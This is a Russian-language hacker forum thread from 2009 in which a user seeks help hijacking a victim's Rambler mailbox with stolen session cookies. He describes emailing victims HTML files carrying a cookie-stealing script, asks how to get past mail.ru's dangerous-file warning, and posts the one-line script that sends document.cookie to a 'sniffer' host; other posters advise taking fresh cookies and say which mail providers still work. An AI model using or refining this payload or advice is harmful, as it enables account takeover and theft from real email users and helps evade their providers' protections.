PDA

Просмотр полной версии : Не могу зайти на почту!

LemoTTT
19.05.2009, 16:42
Проблема такова:
Украл куки с рамблеровского ящика жертвы, куки в себе содержат такие параметры
rmw=***********
rmclick=***********
begun_uuid=***********
dv=***********
dvr=***********
lvr=***********
ruid=***********
rlogin=***********
rup=***********
Звездочками скрыл данные(не хочю разглашать)
Так вот, иду в оперу заменяю куки как положено, нажимаю обновить и ничего не происходит, я остаюся в своем же ящике, посоветуйте что то?!
или посоветуйте прогу, которой можно было бы раскодировать пароль из куки!
МongBa†
19.05.2009, 17:48
Раскодировать пароль - никак, правда ходят слухи, что есть умельцы которые извлекают из них МД5 пароля и готовы поделиться способом за $$$, но скорей всего кидалы...
По теме - мб он нажал "Выход", либо залогинился с др. браузера после того как ты слизал куки, мб он вообще не ставил галку на "Запомнить меня"

Вобщем устарели куки... тяни новые...
LemoTTT
19.05.2009, 18:21
удаляйте тему!
bagration
19.05.2009, 22:04
вроде как с рамблера не получится такая хренатень
LemoTTT
19.05.2009, 22:33
Когда я присылаю жертве html файл со скриптом, который крадет куки:
если ящик жертвы на
1) rambler, то куки на сниффер приходят, я их заменяю,но не могу зайти в ящик жертвы!

2)yandex, то куки вообще на сниффер не приходят!

3)mail.ru, при получении файла , у жертвы красным написано "Потенциально опасный файл", и как ето предотвратить, уже и ссылку на сниффер кодирывал!

Посоветуйте что и как мне лучше делать?!
lmns
19.05.2009, 23:37
Когда я присылаю жертве html файл со скриптом, который крадет куки:
если ящик жертвы на
1) rambler, то куки на сниффер приходят, я их заменяю,но не могу зайти в ящик жертвы!

2)yandex, то куки вообще на сниффер не приходят!

3)mail.ru, при получении файла , у жертвы красным написано "Потенциально опасный файл", и как ето предотвратить, уже и ссылку на сниффер кодирывал!

Посоветуйте что и как мне лучше делать?!
ты одну XSS на 3 почтовика юзаешь? O_o
FatalLerr0r
20.05.2009, 08:34
На рамблере такая штука уже непройдет, непытайся, а насчет @mail.ru и @yandex.ru то там все ок пашет!
timeR
22.05.2009, 01:10
ты скрипт то хоть покажи, как я понял ты вообще xss не юзаешь 8D
LemoTTT
22.05.2009, 01:18
<script>img = new Image(); img.src = "адресс сниффера"+document.cookie;</script>
адресс сниффера закодирован
ЗЫ: xss бред, лично мое мнение!
timeR
22.05.2009, 02:02
8D промолчу...